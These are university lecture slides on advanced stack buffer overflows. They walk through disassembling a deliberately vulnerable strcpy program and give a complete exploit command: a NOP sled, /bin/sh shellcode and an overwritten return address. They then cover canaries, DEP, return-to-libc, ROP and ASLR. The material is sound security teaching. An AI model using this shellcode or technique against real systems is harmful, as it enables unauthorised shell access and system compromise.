Advanced Buffer Overflow - PDF Free Download

Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2016/2017 Department of Electrical and Electronic Engineering University of Cagliari, Italy

Contents Introduction Advanced Attacks Analyzing Vulnerable Functions Advanced Exploiting Shellcode Complete Attack Countermeasures And Advanced Attacks Canaries DEP Return Oriented Programming and ASLR 10K Students Challenge 2

Introduction 3

Introduction Advanced Attacks In the previous lectures, we introduced the basics of reverse engineering and buffer overflow However, there was nothing particularly «dangerous» for the security of the system In this lecture, you will see how buffer overflow can be extremely dangerous You will violate the security of a system We also see the prominent defense techniques 4

Challenge! Open the file called «vulnerable» Try to execute it The program needs an argument! However, it doesn t seem to influence the behavior of the program The program itself, thought, tells you that it s vulnerable J 5

First Analyses As usual, the first step is disassembling the executable to look for interesting functions Sadly, this file does not contain other user-implemented functions apart from main! Let s analyze main to retrieve called library functions printf strcpy puts The fact that strcpy is there is a big problem! In fact, such function is potentially vulnerable There are also conditional jumps cmpl is essentially equal to cmp (we won t provide more details) jg jumps basing on the results of cmpl if the result is greater than zero, jumps to the destination offset 6

Analysis of main (First Part) 0804847d <main>: 804847d: push %ebp 804847e: mov %esp,%ebp 8048480: and $0xfffffff0,%esp 8048483: sub $0x410,%esp 8048489: cmpl $0x1,0x8(%ebp) 804848d: jg 80484a2 <main+0x25> 804848f: movl $0x8048560,(%esp) 8048496: call 8048330 <printf@plt> 804849b: mov $0x0,%eax 80484a0: jmp 80484cb <main+0x4e> Allocates space for locals (1040 bytes + alignment) Compares an argument of main with the value 1. Note how the arguments of main are above ebp. The parameters of main are, usually, int argc, char** argv. In this case, the argc value is compared to 1. Hence, if the number of arguments is greater than 1, jumps to 80484A2 (remember that the name of the program is also an argument ) If the comparison fails (i.e., if the program receives less than 2 arguments), the program prints to the stdout and quits by going to 80484cb 7

Analysis of main (Second Part) 80484a2: mov 0xc(%ebp),%eax 80484a5: add $0x4,%eax 80484a8: mov (%eax),%eax 80484aa: mov %eax,0x4(%esp) 80484ae: lea 0x10(%esp),%eax 80484b2: mov %eax,(%esp) 80484b5: call 8048340 <strcpy@plt> The first 4 instructions loads (4 bytes above esp) the address of the array that is passed as SECOND parameter to strcpy. The eax register receives the address that are 16 bytes above esp (0x10), i.e., the address of the destination array (which is the FIRST parameter of strcpy see below) Loads the first parameter of strcpy (i.e., the value eax) to the location pointed by esp and calls strcpy. Hence, strcpy(buf, argv[1]). buf is pointed by esp, whilst the address of argv[1] is stored on esp+4 80484ba: movl $0x804857c,(%esp) 80484c1: call 8048350 <puts@plt> 80484c6: mov $0x0,%eax 80484cb: leave 80484cc: ret 80484cd: xchg %ax,%ax 80484cf: nop Loads the address of the string that will be used as parameter of puts and completes the execution 8

Thus What did we understand from the two previous slides? The program performs the following: It must receive an argument apart from the name of the program (otherwise it quits) It statically allocates a lot of memory in the main stackframe (a local variable will be stored main stackframe It calls a function that copies the received argument to a local variable This argument is an array (look how much space is allocated in memory!) The bytes are copied with a strcpy Which does not perform a control of the size of the array Thus, our program is potentially vulnerable 9

Advanced Exploiting 10

Attack Procedure The technique is the same that we saw in the previous lecture We fill the buffer (the local variable of main) Until we reach the memory location pointed by ebp Then, the attacker overwrites with a chosen address the return address that is located at ebp+4 The problem now is: which address shall we use? We cannot access other functions now (nor we are interested in doing so) Let s see a more effective attack! We will directly inject a code that performs an attack! 11

Attack Procedure (2) The attack strategy is therefore a bit different We fill the buffer (the local variable main) with a code that is specifically written to perform an attack The code must be injected so that the buffer is totally filled, and IT MUST STOP RIGHT BEFORE THE RETURN ADDRESS (it should NOT overwrite EBP+4) The return address is overwritten with the starting address of the attack code If everything works the code is executed! If the attack code opens a shell, it is usually called shellcode 12

Shellcode A shellcode is, like the name itself says, a sequence of instructions that lead to opening a shell By running shell it is possible to take control of the attacked system (if this is done with root permissions)! Such shell can be also open in a remote system Such code is usually injected as bytes that, are translated to instructions during the execution There are many ways (hence, multiple shellcodes) to generate a shell, depending on: The operating system The executable/processor architecture The fact that the shell is remote or not etc. 13

Part of a Shellcode (Example) "\x31\xc0" /* xor %eax,%eax */ "\xb0\x01" /* mov $0x1,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\xcd\x80"; /* int $0x80 */ sys_exit(0) "\x31\xc0\xb0\x01\x31\xdb\xcd\x80" 14

Buffer Composition A first structure of the buffer can be described as follows: Put some random data (size = n) Add the shellcode (size = b) Add other data (size = d MUST OVERWRITE BOTH THE ALIGNMENT DATA AND EBP) We must cover all the space till the return address (ebp+4) In our case, 1040-16 (In our case, the array starts from ebp-0x410+ 0x10)+Alignment = 1024 byte + Alignment How much alignment do we have? To find out: With gdb, add a breakpoint right after and $0xfffffff0,%esp Alignment = ebp esp in that breakpoint! (In our case, 8 byte) Hence: 1024 + 8 (alignment) = 1032 byte Add other 4 byte to cover EBP and other 4 for the return address -> 1040 byte in total! However, this does NOT work The exact address of the shellcode in memory might be not be known in advance You are not sure about the correctness of the return address 15

NOP Sled We do not need to know where the shellcode exactly starts We can point to a random point of the buffer before the shellcode starts, but these bytes should ALL be NOP instructions, represented by the \x90 byte This technique is called NOP sled When you reach a sequence of NOP, the processor executes these instructions (resulting in doing nothing) And reaches the shellcode! The best way to perform the attack is, therefore: Fill the whole buffer with NOP (hence with \x90 bytes), leaving space only for the shellcode and the return address Add shellcode Add the return address We will use a 45 byte shellcode. Since we have to put 1040 bytes in total we will have: 991 byte NOP + 45 byte Shellcode + 4 bytes of return address 16

Finalizing the Attack We will use GDB to perform the attack (we will see why later on) Gdb must be executed with a parameter (our attack) gdb args./vulnerabile ARGUMENT Careful to the order of commands! We need a perl script again To pass it to gdb, we have to use the $(..script ) notation We will have the usual combination of print as script As random buffer address, we choose 0xbffff048 (obviously, you can pick up another one) Remember little endianness! We use as shellcode: "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0 b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xc d\x80\xe8\xdc\xff\xff\xff/bin/sh" 17

Complete Attack gdb --args./vulnerabile $( perl e print \x90 x991; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb 0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd 8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh ; print \x48\xf0\xff\xbf ) 18

Defense Strategies Even if very powerful, it s possible to defend against this attack Can be easily detected The application has not been compiled with the «usual» procedure The source has been compiled with these flags gcc fno-stack-protector z execstack o vulnerable vulnerable.c By not using them, the attack would not work Besides, this attack would not work outside gdb Let s see some of the most important attack techniques: Canaries DEP ASLR 19

Countermeasures and Advanced Attacks 20

Canaries Canaries are values (typically of 4 bytes that are put between the saved frame pointer and the locals of a function When a stack overflow is performed, we overwrite these values If this happens, The program is immediately stopped! 21

Types of Canaries Three types Terminator Random Random XOR Terminator exploits the fact that a canary contains a terminator character The terminator character stops strcpy (so you cannot inject it) But we cannot overwrite it, as the protection makes the program stop Can be still bypassed Random sets the canary to a random value, which is checked at runtime There are some performances drawbacks Random XOR further complicates the generation of the random value 22

DEP Acronym for Data Execution Prevention Exploits the fact that a memory location that can be written (hence, with flag W) cannot be also executed We remove the execution flag from the written part of the stack Therefore, our exploit would not work! We write data on the stack And we cannot execute them! Is it possible to bypass this? 23

Return-To-Libc With DEP you cannot run the code you injected into the stack But what happens if you manage to «reconstruct» a shellcode during the execution of the program? The key idea is: what cannot we avoid to execute? A possible answer is given by library functions Also called libc functions Example: system(), exit(), execl() Key idea: constructing an artificial stack frame by injecting the address of the library function, as well as its parameters and return address You can also chain these stackframes to build a sequence of system calls! 24

Return To Libc Artificial Stack The key idea is that we overwrite the return address with the one of a library function call (in this case, system, which takes the /bin/sh parameter as input). However, to return to a function that uses parameters, we have to inject: A)The address of System, B) A DUMMY return address, C) The parameter of System This is because the system function is invoked without a call instruction, so no return address will be added. After system is called, its parameter should stay at old EBP + 8! «/bin/sh» DUMMY Return System Address Random Data Before System is called «/bin/sh» DUMMY Return OLD EBP Random Data After System Is called 25

Return Oriented Programming It s the evolution of return-to-libc Instead of using system functions, we use pieces of code (also taken from library functions) which all end up with pop and ret instructions (which allow to control esp to apply what we saw in the previous slide to multiple functions) The code is legitimate, as it is currently executed by the program! If you manage to combine multiple pieces of code (called ROPGadgets) you could create a custom shellcode! This completely bypasses DEP One of the most advanced techniques to attack 26

Return Oriented Programming - Example -- ret ret &gadget3 &gadget2 &gadget1 27

ASLR A ROP-based attack can be stopped with ASLR Address Space Layout Randomization To find ROPGadgets, it is necessary to know their position in memory This techniques randomizes the position of the stack, heap and library functions In this way, the attacker could not easily retrieve the required information from the stack! Not invincible, but a very strong protection! 28

10K Students Challenge Ensemble of lectures that teach students the basics of computer security and binary analysis Goal: teaching security to 10000 students all over Europe Sponsored by Vrije Universiteit Amsterdam A lot of European universities joined the project In the official website you will find challenges that are similar (but harder) to the ones we saw in this course There are also YouTube videos Videos are in English, explained by prof. Herbert Bos You can find the material on http://10kstudents.eu/ 29

WARGAMES! Really interested in reverse engineering? You can improve your skills with war games Hacking games where you have to exploit more and more complex vulnerabilities to go to next levels There are many wargames related to various vulnerabilities A very popular one for reverse engineering is http://smashthestack.org/ For every challenge you win, you can put your name to a public repository of winners! Use yourname@pralabinfosec17 30